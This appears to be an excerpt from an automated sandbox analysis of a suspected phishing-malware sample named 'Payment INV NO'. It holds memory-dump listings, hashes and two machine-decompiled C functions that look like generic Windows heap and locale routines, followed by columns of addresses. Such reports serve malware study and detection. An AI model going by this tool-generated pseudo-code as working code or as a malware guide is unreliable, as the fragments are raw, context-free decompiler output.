                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: eddf81ae01171206063654514784a312fc31df2b60403ff67092daef65505c12
                                                          • Instruction ID: 8df0b62cba9826656c53f7f5331620410eae36c8454452d8d1c645c9e10a4d4d
                                                          • Opcode Fuzzy Hash: eddf81ae01171206063654514784a312fc31df2b60403ff67092daef65505c12
                                                          • Instruction Fuzzy Hash: 2AB15074A0026A8BDB64DF68D884BA9F7F5AF44700F0485EAD54AEB341EB349D85CF21
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017C37EB Relevance: .3, Instructions: 269COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 87%
                                                          			E017C37EB(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t99;
				intOrPtr _t103;
				intOrPtr _t104;
				char* _t114;
				signed short _t124;
				signed int _t125;
				signed int _t130;
				intOrPtr* _t134;
				intOrPtr* _t135;
				intOrPtr* _t136;
				intOrPtr* _t140;
				intOrPtr* _t142;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t155;
				signed int _t156;
				intOrPtr _t157;
				intOrPtr _t160;
				signed short _t164;
				signed short _t165;
				signed int _t174;
				intOrPtr* _t177;
				short _t179;
				intOrPtr _t180;
				intOrPtr* _t182;
				intOrPtr _t183;
				void* _t184;

				_push(0x50);
				_push(0x186ff48);
				E017ED08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t184 - 0x44)) = __ecx;
				 *((intOrPtr*)(_t184 - 0x1c)) = 0xc0000001;
				 *((intOrPtr*)(_t184 - 0x24)) = 0;
				 *((intOrPtr*)(__ecx)) = 0;
				 *(_t184 - 0x2c) = __edx & 0x00000001;
				_t99 = E017AB060(__ecx,  *((intOrPtr*)( *[fs:0x30] + 8)));
				if(_t99 == 0) {
					_t179 = 0xc000007b;
					L28:
					return E017ED0D1(_t179);
				}
				_t150 =  *((intOrPtr*)(_t99 + 0x60));
				 *((intOrPtr*)(_t184 - 0x38)) =  *((intOrPtr*)(_t99 + 0x60));
				_t180 =  *((intOrPtr*)(_t99 + 0x64));
				 *((intOrPtr*)(_t184 - 0x30)) = _t180;
				_t103 =  *((intOrPtr*)( *[fs:0x30] + 0x208));
				if(_t103 != 0) {
					if(_t180 < _t103) {
						 *((intOrPtr*)(_t184 - 0x30)) = _t103;
					}
				}
				_t104 =  *0x18884c4; // 0x0
				_t182 = E017B4620(_t150,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t104 + 0x000c0000 | 0x00000008, 0x120);
				 *((intOrPtr*)(_t184 - 0x20)) = _t182;
				 *((intOrPtr*)(_t184 - 4)) = 0;
				 *((intOrPtr*)(_t184 - 0x40)) = 1;
				if(_t182 == 0) {
					L36:
					_t179 = 0xc0000017;
					 *((intOrPtr*)(_t184 - 0x1c)) = 0xc0000017;
					goto L24;
				} else {
					_t152 =  *0x18884c4; // 0x0
					_t153 = _t152 + 0xc0000;
					 *((intOrPtr*)(_t184 - 0x48)) = _t152 + 0xc0000;
					_t154 = E017B4620(_t152 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t153,  *0x18884c0 * 0x24);
					 *((intOrPtr*)(_t184 - 0x24)) = _t154;
					if(_t154 == 0) {
						_t179 = 0xc0000017;
						 *((intOrPtr*)(_t184 - 0x1c)) = 0xc0000017;
						_t182 =  *((intOrPtr*)(_t184 - 0x20));
						L24:
						 *((intOrPtr*)(_t184 - 4)) = 0xfffffffe;
						 *((intOrPtr*)(_t184 - 0x40)) = 0;
						E017C3B5A(_t108, 0, _t179, _t182);
						if(_t179 < 0) {
							goto L28;
						}
						 *((intOrPtr*)( *((intOrPtr*)(_t184 - 0x44)))) = _t182;
						if(E017B7D50() != 0) {
							_t114 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							_t179 =  *((intOrPtr*)(_t184 - 0x1c));
							_t182 =  *((intOrPtr*)(_t184 - 0x20));
						} else {
							_t114 = 0x7ffe0386;
						}
						if( *_t114 != 0) {
							L32:
							L01868BB6(_t182);
						}
						goto L28;
					}
					_t155 = 0;
					 *(_t184 - 0x28) = 0;
					_t183 =  *((intOrPtr*)(_t184 - 0x20));
					_t174 =  *0x18884c0; // 0x1
					while(_t155 < 3) {
						 *((intOrPtr*)(_t183 + 0x10 + _t155 * 4)) = _t174 * _t155 * 0xc +  *((intOrPtr*)(_t184 - 0x24));
						_t155 = _t155 + 1;
						 *(_t184 - 0x28) = _t155;
					}
					_t156 = 0;
					while(1) {
						 *(_t184 - 0x28) = _t156;
						if(_t156 >= _t174 * 3) {
							break;
						}
						_t142 = _t156 * 0xc +  *((intOrPtr*)(_t184 - 0x24));
						 *((intOrPtr*)(_t142 + 8)) = 0;
						 *((intOrPtr*)(_t142 + 4)) = _t142;
						 *_t142 = _t142;
						_t156 = _t156 + 1;
					}
					_t157 =  *0x18884c4; // 0x0
					_t158 = _t157 + 0xc0000;
					 *(_t184 - 0x4c) = _t157 + 0xc0000;
					_t108 = E017B4620(_t158 | 0x00000008,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t158 | 0x00000008, _t174 << 2);
					_t182 =  *((intOrPtr*)(_t184 - 0x20));
					 *((intOrPtr*)(_t182 + 0x1c)) = _t108;
					if(_t108 == 0) {
						goto L36;
					}
					_t160 =  *0x18884c4; // 0x0
					_t161 = _t160 + 0xc0000;
					 *(_t184 - 0x50) = _t160 + 0xc0000;
					_t108 = E017B4620(_t161 | 0x00000008,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161 | 0x00000008,  *0x18884c0 * 0xc);
					_t182 =  *((intOrPtr*)(_t184 - 0x20));
					 *((intOrPtr*)(_t182 + 0x20)) = _t108;
					if(_t108 == 0) {
						goto L36;
					}
					_t124 =  *0x7ffe03c0;
					 *(_t184 - 0x34) = _t124;
					 *(_t184 - 0x54) = _t124;
					 *(_t182 + 0x100) = _t124;
					_t179 = E017C3B7A(_t182);
					 *((intOrPtr*)(_t184 - 0x1c)) = _t179;
					if(_t179 < 0) {
						goto L24;
					}
					 *((intOrPtr*)(_t182 + 0x104)) = 0xfffffffe;
					 *(_t184 - 0x60) = 0;
					 *((intOrPtr*)(_t184 - 0x5c)) = 0;
					_t164 =  *(_t184 - 0x34);
					_t125 = _t164 & 0x0000ffff;
					 *(_t184 - 0x60) = _t125;
					 *(_t182 + 8) = _t125;
					 *((intOrPtr*)(_t182 + 0xc)) = 0;
					 *_t182 = 1;
					if(_t164 < 4) {
						_t165 = 4;
					} else {
						_t165 = _t164 + 1;
					}
					 *(_t184 - 0x34) = _t165;
					_t49 = _t182 + 0x28; // 0x28
					_push(_t165);
					_push(0);
					_push(0x1f0003);
					_t179 = E017D9F70();
					 *((intOrPtr*)(_t184 - 0x1c)) = _t179;
					if(_t179 < 0) {
						goto L24;
					} else {
						 *((intOrPtr*)(_t184 - 4)) = 1;
						 *((intOrPtr*)(_t184 - 0x3c)) = 1;
						_t130 =  *0x7ffe03c0 << 2;
						if(_t130 < 0x200) {
							_t130 = 0x200;
						}
						_t53 = _t182 + 0x24; // 0x24
						_push( *((intOrPtr*)(_t184 - 0x30)));
						_push( *((intOrPtr*)(_t184 - 0x38)));
						_push(_t130);
						_push(_t182);
						_push(0x17bc740);
						_push(0xffffffff);
						_push( *((intOrPtr*)(_t182 + 0x28)));
						_push(0);
						_push(0xf00ff);
						_t179 = E017DA160();
						 *((intOrPtr*)(_t184 - 0x1c)) = _t179;
						if(_t179 < 0) {
							L23:
							 *((intOrPtr*)(_t184 - 4)) = 0;
							 *((intOrPtr*)(_t184 - 0x3c)) = 0;
							_t108 = E017C3B48(_t131, 0, _t179, _t182);
							goto L24;
						} else {
							if( *(_t184 - 0x2c) != 0) {
								_push(4);
								_push(_t184 - 0x2c);
								_push(0xd);
								_push( *((intOrPtr*)(_t182 + 0x24)));
								_t179 = E017DAE70();
								 *((intOrPtr*)(_t184 - 0x1c)) = _t179;
								if(_t179 < 0) {
									goto L23;
								}
								 *((short*)(_t182 + 0xe6)) =  *(_t184 - 0x2c);
							}
							 *((intOrPtr*)(_t182 + 0x2c)) = 0;
							 *((intOrPtr*)(_t182 + 0xe0)) = 0;
							 *((intOrPtr*)(_t182 + 0x110)) = 0;
							 *((short*)(_t182 + 0xe4)) = 0;
							_t63 = _t182 + 0x30; // 0x30
							_t134 = _t63;
							 *((intOrPtr*)(_t134 + 4)) = _t134;
							 *_t134 = _t134;
							_t65 = _t182 + 0x38; // 0x38
							_t135 = _t65;
							 *((intOrPtr*)(_t135 + 4)) = _t135;
							 *_t135 = _t135;
							_t67 = _t182 + 0x114; // 0x114
							_t136 = _t67;
							 *((intOrPtr*)(_t136 + 4)) = _t136;
							 *_t136 = _t136;
							E017BF194(_t182, _t184 - 0x58, 0);
							_t182 =  *((intOrPtr*)(_t184 - 0x20));
							 *((intOrPtr*)(_t182 + 0xf0)) =  *((intOrPtr*)(_t184 + 4));
							_t73 = _t182 + 0x40; // 0x40
							_t179 = E017C196E(_t73, _t182);
							 *((intOrPtr*)(_t184 - 0x1c)) = _t179;
							if(_t179 < 0) {
								goto L23;
							}
							_t179 = 0;
							 *((intOrPtr*)(_t184 - 0x1c)) = 0;
							E017B2280(_t131, 0x18886b4);
							 *((intOrPtr*)(_t184 - 4)) = 2;
							_t77 = _t182 + 0xe8; // 0xe8
							_t140 = _t77;
							_t177 =  *0x18853dc; // 0x1263188
							if( *_t177 != 0x18853d8) {
								_push(3);
								asm("int 0x29");
								goto L32;
							}
							 *_t140 = 0x18853d8;
							 *((intOrPtr*)(_t140 + 4)) = _t177;
							 *_t177 = _t140;
							 *0x18853dc = _t140;
							 *((intOrPtr*)(_t184 - 4)) = 1;
							_t131 = E017C3B3D();
							goto L23;
						}
					}
				}
			}






























                                                          0x017c37eb
                                                          0x017c37ed
                                                          0x017c37f2
                                                          0x017c37f7
                                                          0x017c37fa
                                                          0x017c3803
                                                          0x017c3806
                                                          0x017c380b
                                                          0x017c3817
                                                          0x017c381e
                                                          0x0180615c
                                                          0x017c3b0c
                                                          0x017c3b13
                                                          0x017c3b13
                                                          0x017c3824
                                                          0x017c3827
                                                          0x017c382a
                                                          0x017c382d
                                                          0x017c3836
                                                          0x017c383e
                                                          0x01806168
                                                          0x0180616e
                                                          0x0180616e
                                                          0x01806168
                                                          0x017c3844
                                                          0x017c3865
                                                          0x017c3867
                                                          0x017c386a
                                                          0x017c386d
                                                          0x017c3876
                                                          0x01806176
                                                          0x01806176
                                                          0x0180617b
                                                          0x00000000
                                                          0x017c387c
                                                          0x017c387c
                                                          0x017c3882
                                                          0x017c3888
                                                          0x017c38a2
                                                          0x017c38a4
                                                          0x017c38a9
                                                          0x01806183
                                                          0x01806188
                                                          0x0180618b
                                                          0x017c3ad9
                                                          0x017c3ad9
                                                          0x017c3ae0
                                                          0x017c3ae7
                                                          0x017c3aee
                                                          0x00000000
                                                          0x00000000
                                                          0x017c3af3
                                                          0x017c3afc
                                                          0x01806288
                                                          0x0180628d
                                                          0x01806290
                                                          0x017c3b02
                                                          0x017c3b02
                                                          0x017c3b02
                                                          0x017c3b0a
                                                          0x017c3b71
                                                          0x017c3b73
                                                          0x017c3b73
                                                          0x00000000
                                                          0x017c3b0a
                                                          0x017c38af
                                                          0x017c38b1
                                                          0x017c38b4
                                                          0x017c38b7
                                                          0x017c38bd
                                                          0x017c38cd
                                                          0x017c38d1
                                                          0x017c38d2
                                                          0x017c38d2
                                                          0x017c38d7
                                                          0x017c38d9
                                                          0x017c38d9
                                                          0x017c38e1
                                                          0x00000000
                                                          0x00000000
                                                          0x017c38e6
                                                          0x017c38e9
                                                          0x017c38ec
                                                          0x017c38ef
                                                          0x017c38f1
                                                          0x017c38f1
                                                          0x017c38f4
                                                          0x017c38fa
                                                          0x017c3900
                                                          0x017c3916
                                                          0x017c391b
                                                          0x017c391e
                                                          0x017c3923
                                                          0x00000000
                                                          0x00000000
                                                          0x017c3929
                                                          0x017c392f
                                                          0x017c3935
                                                          0x017c394d
                                                          0x017c3952
                                                          0x017c3955
                                                          0x017c395a
                                                          0x00000000
                                                          0x00000000
                                                          0x017c3960
                                                          0x017c3965
                                                          0x017c3968
                                                          0x017c396b
                                                          0x017c3978
                                                          0x017c397a
                                                          0x017c397f
                                                          0x00000000
                                                          0x00000000
                                                          0x017c3985
                                                          0x017c398f
                                                          0x017c3992
                                                          0x017c3995
                                                          0x017c3998
                                                          0x017c399b
                                                          0x017c399e
                                                          0x017c39a1
                                                          0x017c39a4
                                                          0x017c39ad
                                                          0x01806195
                                                          0x017c39b3
                                                          0x017c39b3
                                                          0x017c39b3
                                                          0x017c39b4
                                                          0x017c39b7
                                                          0x017c39ba
                                                          0x017c39bb
                                                          0x017c39bc
                                                          0x017c39c7
                                                          0x017c39c9
                                                          0x017c39ce
                                                          0x00000000
                                                          0x017c39d4
                                                          0x017c39d7
                                                          0x017c39da
                                                          0x017c39e2
                                                          0x017c39ec
                                                          0x017c39ee
                                                          0x017c39ee
                                                          0x017c39f0
                                                          0x017c39f3
                                                          0x017c39f6
                                                          0x017c39f9
                                                          0x017c39fa
                                                          0x017c39fb
                                                          0x017c3a00
                                                          0x017c3a02
                                                          0x017c3a05
                                                          0x017c3a06
                                                          0x017c3a11
                                                          0x017c3a13
                                                          0x017c3a18
                                                          0x017c3aca
                                                          0x017c3aca
                                                          0x017c3acd
                                                          0x017c3ad4
                                                          0x00000000
                                                          0x017c3a1e
                                                          0x017c3a22
                                                          0x017c3b14
                                                          0x017c3b19
                                                          0x017c3b1a
                                                          0x017c3b1c
                                                          0x017c3b24
                                                          0x017c3b26
                                                          0x017c3b2b
                                                          0x00000000
                                                          0x00000000
                                                          0x017c3b31
                                                          0x017c3b31
                                                          0x017c3a28
                                                          0x017c3a2b
                                                          0x017c3a31
                                                          0x017c3a37
                                                          0x017c3a3e
                                                          0x017c3a3e
                                                          0x017c3a41
                                                          0x017c3a44
                                                          0x017c3a46
                                                          0x017c3a46
                                                          0x017c3a49
                                                          0x017c3a4c
                                                          0x017c3a4e
                                                          0x017c3a4e
                                                          0x017c3a54
                                                          0x017c3a57
                                                          0x017c3a5f
                                                          0x017c3a67
                                                          0x017c3a6a
                                                          0x017c3a70
                                                          0x017c3a7a
                                                          0x017c3a7c
                                                          0x017c3a81
                                                          0x00000000
                                                          0x00000000
                                                          0x017c3a83
                                                          0x017c3a85
                                                          0x017c3a8d
                                                          0x017c3a92
                                                          0x017c3a99
                                                          0x017c3a99
                                                          0x017c3a9f
                                                          0x017c3aac
                                                          0x017c3b6c
                                                          0x017c3b6f
                                                          0x00000000
                                                          0x017c3b6f
                                                          0x017c3ab2
                                                          0x017c3ab4
                                                          0x017c3ab7
                                                          0x017c3ab9
                                                          0x017c3abe
                                                          0x017c3ac5
                                                          0x00000000
                                                          0x017c3ac5
                                                          0x017c3a18
                                                          0x017c39ce

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fe0b3d9a1babe3342c89e1d0662ab3ecfe624b9c6186a38a75d215a67ad9a3a0
                                                          • Instruction ID: 72cee04142a2aee0bb45c82ae8e9e748b1e5e1de9f1197c2c56a43c847da2b77
                                                          • Opcode Fuzzy Hash: fe0b3d9a1babe3342c89e1d0662ab3ecfe624b9c6186a38a75d215a67ad9a3a0
                                                          • Instruction Fuzzy Hash: 3AB125B19006099FCB15DF99C980BAEFBF5FB48710F14816EE51AAB351D734AA01CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017A38A4 Relevance: .2, Instructions: 246COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 89%
                                                          			E017A38A4(intOrPtr __ecx, signed int __edx, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16, signed int* _a20) {
				char _v24;
				signed char _v28;
				signed short _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				void* _v48;
				signed int _v52;
				short _v56;
				signed int _v60;
				signed int _v64;
				void* _v68;
				void* _v72;
				void* _v76;
				void* _v80;
				void* _v84;
				void* _v88;
				void* _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t98;
				signed int _t99;
				void* _t104;
				void* _t109;
				signed int _t110;
				void* _t111;
				signed int _t115;
				signed short _t121;
				signed int _t122;
				intOrPtr* _t123;
				signed int _t134;
				signed int _t136;
				signed char _t139;
				signed int _t140;
				signed int _t141;
				signed int* _t142;
				intOrPtr _t146;
				void* _t147;
				signed int _t149;
				void* _t156;
				void* _t162;
				signed int _t164;
				signed int _t167;
				signed int _t172;
				signed int _t175;
				signed int _t177;
				intOrPtr _t179;
				signed int _t180;
				void* _t182;

				_t182 = (_t180 & 0xfffffff8) - 0x34;
				_v44 = __ecx;
				_t98 = _a4 + _a4;
				_v36 = _t98;
				_t175 = 0;
				_v48 = 0;
				_v32 = 0;
				_v56 = 0xffffffff;
				_t136 = __edx;
				_v40 = __edx;
				_t172 = 0;
				if(_t98 <= 0 || __edx == 0 || _a20 == 0 || (_a12 & 0xffffffe0) != 0) {
					_t99 = 0xc000000d;
				} else {
					_t146 = E017B4620(0xffffffff,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xaa);
					_v40 = _t146;
					if(_t146 == 0) {
						_t99 = 0xc0000017;
						L26:
						return _t99;
					}
					_t147 = _v36;
					while( *_t136 != _t175 && _t147 > 0) {
						_t149 = _t136;
						_v52 = _t175;
						_t16 = _t149 + 2; // 0x2
						_t162 = _t16;
						do {
							_t104 =  *_t149;
							_t149 = _t149 + 2;
						} while (_t104 != _t175);
						_t151 = _t149 - _t162 >> 1;
						 *((intOrPtr*)(_t182 + 0x38)) = (_t149 - _t162 >> 1) + (_t149 - _t162 >> 1);
						E017DBB40(_t151, _t182 + 0x3c, _t136);
						_push( &_v60);
						_t109 = _t182 + 0x3c;
						if((_a8 & 0x00000004) != 0) {
							_push(0x10);
							_push(_t109);
							_t110 = E017D13C0(_t136, _t172, _t175, __eflags);
							__eflags = _t110;
							if(_t110 < 0) {
								L52:
								_t136 = _t136 + 2 + _v28;
								_t111 = 0xfffffffe;
								_t147 = _v48 + _t111 - _v28;
								_v52 = _t136;
								_v48 = _t147;
								__eflags = _t136;
								if(_t136 != 0) {
									continue;
								}
								break;
							}
							_t177 = _v64;
							__eflags = _t177 - 0x1000;
							if(_t177 == 0x1000) {
								L44:
								__eflags = _a12 & 0x00000004;
								if((_a12 & 0x00000004) != 0) {
									L51:
									_t175 = 0;
									__eflags = 0;
									goto L52;
								}
								__eflags = _a12 & 0x00000008;
								if((_a12 & 0x00000008) == 0) {
									L47:
									 *((intOrPtr*)(_t182 + 0x3c)) = _v40;
									_v24 = 0xaa0000;
									_t115 = E017A3B30(_t177,  &_v24);
									__eflags = _t115;
									if(_t115 == 0) {
										goto L51;
									}
									__eflags = _a12 & 0x00000002;
									if((_a12 & 0x00000002) != 0) {
										L14:
										_t139 = 1;
										_v60 = _t177;
										L15:
										if(E017A3AD2(_v56, _t139 & 0x000000ff, _v60,  &_v68) < 0) {
											__eflags = _a8 & 0x00000002;
											if((_a8 & 0x00000002) != 0) {
												L18:
												_t164 =  *_a20;
												if(_t164 == 0) {
													_t164 = E017A7608(1, _a12 & 0x00000001, _v56);
													 *_a20 = _t164;
													__eflags = _t164;
													if(_t164 != 0) {
														goto L19;
													}
													L60:
													_t172 = 0xc0000017;
													break;
												}
												L19:
												_t121 =  *(_t164 + 4) & 0x0000ffff;
												_t156 = 0;
												_v32 = _t121;
												_t122 = _t121 & 0x0000ffff;
												_v36 = _t122;
												if(_t122 != 0) {
													_t123 =  *((intOrPtr*)(_t164 + 0x10));
													_t167 = _t139 & 0x000000ff;
													_t140 = _v36;
													_v64 = _t167;
													while(1) {
														__eflags =  *_t123 - _t167;
														if( *_t123 == _t167) {
															goto L57;
														}
														L31:
														_t156 = _t156 + 1;
														_t123 = _t123 + 6;
														_t164 =  *_a20;
														__eflags = _t156 - _t140;
														if(_t156 < _t140) {
															_t167 = _v64;
															__eflags =  *_t123 - _t167;
															if( *_t123 == _t167) {
																goto L57;
															}
															goto L31;
														}
														_t141 = _v64;
														L21:
														if(_v32 >=  *((intOrPtr*)(_t164 + 6))) {
															_t164 = L0184DE80();
															 *_a20 = _t164;
															__eflags = _t164;
															if(_t164 != 0) {
																goto L22;
															}
															goto L60;
														}
														L22:
														 *(( *(_t164 + 4) & 0x0000ffff) * 6 +  *((intOrPtr*)(_t164 + 0x10))) = _t141;
														_t142 = _a20;
														 *(( *( *_t142 + 4) & 0x0000ffff) * 6 +  *((intOrPtr*)( *_t142 + 0x10)) + 4) = _t177;
														 *( *_t142 + 4) =  *( *_t142 + 4) + 1;
														L23:
														_t179 = _v44 + 1;
														_v44 = _t179;
														if(_t179 < _a16) {
															goto L28;
														}
														_t172 = 0;
														goto L25;
														L57:
														__eflags =  *((intOrPtr*)(_t123 + 4)) - _t177;
														if( *((intOrPtr*)(_t123 + 4)) == _t177) {
															goto L23;
														}
														goto L31;
													}
												}
												_t141 = _t139 & 0x000000ff;
												goto L21;
											}
											L28:
											_t136 = _v52;
											goto L51;
										}
										if((_a8 & 0x00000010) == 0) {
											_t177 = _v68;
											_t139 = 2;
											_v60 = _t177;
										}
										goto L18;
									}
									__eflags = _t177 - 0x1000;
									if(_t177 == 0x1000) {
										goto L51;
									}
									__eflags = _t177 - 0x1400;
									if(_t177 != 0x1400) {
										goto L14;
									}
									goto L51;
								}
								_t172 = 0xc00000bb;
								break;
							}
							__eflags = _t177 - 0x1400;
							if(_t177 == 0x1400) {
								goto L44;
							}
							__eflags = _t177 - 0x400;
							if(_t177 == 0x400) {
								goto L44;
							}
							__eflags = _t177 - 0xc00;
							if(_t177 == 0xc00) {
								goto L44;
							}
							__eflags = _t177 - 0x800;
							if(_t177 == 0x800) {
								goto L44;
							}
							__eflags = _t177 - 0x7f;
							if(_t177 != 0x7f) {
								goto L47;
							}
							goto L44;
						}
						_push(_t109);
						if(E017A43C0() == 0) {
							goto L52;
						}
						_t177 = _v52;
						if(_t177 == 0x1000 || _t177 == 0x1400) {
							__eflags = _a12 & 0x00000002;
							if((_a12 & 0x00000002) == 0) {
								goto L51;
							}
							_t134 = E0179E50F( &_v48, _v44,  *((intOrPtr*)(_t182 + 0x3c)), 1,  &_v48);
							__eflags = _t134;
							if(_t134 < 0) {
								goto L51;
							}
							_t177 = _v48;
							_t139 = 3;
							goto L15;
						} else {
							goto L14;
						}
					}
					L25:
					E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v28);
					_t99 = _t172;
				}
			}






















































                                                          0x017a38ac
                                                          0x017a38b3
                                                          0x017a38b7
                                                          0x017a38bb
                                                          0x017a38c0
                                                          0x017a38c2
                                                          0x017a38ca
                                                          0x017a38ce
                                                          0x017a38d3
                                                          0x017a38d5
                                                          0x017a38da
                                                          0x017a38de
                                                          0x017f80f3
                                                          0x017a3902
                                                          0x017a3918
                                                          0x017a391a
                                                          0x017a3920
                                                          0x017f7fd1
                                                          0x017a3a5a
                                                          0x017a3a60
                                                          0x017a3a60
                                                          0x017a3926
                                                          0x017a392a
                                                          0x017a393b
                                                          0x017a393d
                                                          0x017a3941
                                                          0x017a3941
                                                          0x017a3944
                                                          0x017a3944
                                                          0x017a3947
                                                          0x017a394a
                                                          0x017a3951
                                                          0x017a3957
                                                          0x017a3960
                                                          0x017a396d
                                                          0x017a396e
                                                          0x017a3972
                                                          0x017f7fdb
                                                          0x017f7fdd
                                                          0x017f7fde
                                                          0x017f7fe3
                                                          0x017f7fe5
                                                          0x017f8071
                                                          0x017f8078
                                                          0x017f807e
                                                          0x017f8083
                                                          0x017f8085
                                                          0x017f8089
                                                          0x017f808d
                                                          0x017f808f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017f8095
                                                          0x017f7feb
                                                          0x017f7fef
                                                          0x017f7ff5
                                                          0x017f801c
                                                          0x017f801c
                                                          0x017f8020
                                                          0x017f806f
                                                          0x017f806f
                                                          0x017f806f
                                                          0x00000000
                                                          0x017f806f
                                                          0x017f8022
                                                          0x017f8026
                                                          0x017f8032
                                                          0x017f8036
                                                          0x017f8040
                                                          0x017f8048
                                                          0x017f804d
                                                          0x017f804f
                                                          0x00000000
                                                          0x00000000
                                                          0x017f8051
                                                          0x017f8055
                                                          0x017a39a2
                                                          0x017a39a2
                                                          0x017a39a4
                                                          0x017a39a9
                                                          0x017a39c0
                                                          0x017a3a63
                                                          0x017a3a67
                                                          0x017a39d8
                                                          0x017a39db
                                                          0x017a39df
                                                          0x017a3ab7
                                                          0x017a3abc
                                                          0x017a3abe
                                                          0x017a3ac0
                                                          0x00000000
                                                          0x00000000
                                                          0x017f80e9
                                                          0x017f80e9
                                                          0x00000000
                                                          0x017f80e9
                                                          0x017a39e5
                                                          0x017a39e5
                                                          0x017a39e9
                                                          0x017a39eb
                                                          0x017a39ef
                                                          0x017a39f2
                                                          0x017a39f8
                                                          0x017a3a76
                                                          0x017a3a79
                                                          0x017a3a7c
                                                          0x017a3a80
                                                          0x017a3a85
                                                          0x017a3a85
                                                          0x017a3a88
                                                          0x00000000
                                                          0x00000000
                                                          0x017a3a8e
                                                          0x017a3a91
                                                          0x017a3a92
                                                          0x017a3a95
                                                          0x017a3a97
                                                          0x017a3a99
                                                          0x017a3acb
                                                          0x017a3a85
                                                          0x017a3a88
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017a3a88
                                                          0x017a3a9b
                                                          0x017a39fd
                                                          0x017a3a05
                                                          0x017f80da
